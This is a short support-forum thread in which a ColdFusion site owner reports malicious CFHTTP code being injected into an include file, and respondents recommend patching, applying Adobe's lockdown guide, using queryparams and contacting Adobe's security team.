Copy link to clipboard
Copied
On two occasions, someone has managed to insert what appears to be malware code into one of my includes. I won't post the actual code, but it consists of a CFHTTP tag that references an IP address, and a CFOUTPUT tag that outputs the value of the CFHTTP. The site is not tied to a database, we only use CFINCLUDEs to simplify global edits (we're relatively new to ColdFusion). The site is hosted by one of Adobe's recommended CF hosting services. Any thoughts on how someone could be adding this code and what we can do to stop them?
Copy link to clipboard
Copied
Hello Orogeny1,
Please make sure that you have applied the lockdown guide and server is fully patched. If still there is a security concern, then please send an email to psirt@adobe.com
Regards,
Anit Kumar
Copy link to clipboard
Copied
Thanks, I'm checking with the hosting service now. I'll let you know what they say.
Copy link to clipboard
Copied
This sounds like you've been the victim of a sql injection attack, or some other exploit. Make sure that you server is fully patched, that you are running your server in accordance with the Lockdown Guide, and that all of your queries are using queryparams (there is a queryparam scanner on RIAForge.org, I think)
Copy link to clipboard
Copied
Yeah. Discovereed that we hadn't done the lockdown guide and we're in the process of doing that right now, Hopefully this will solve the problem.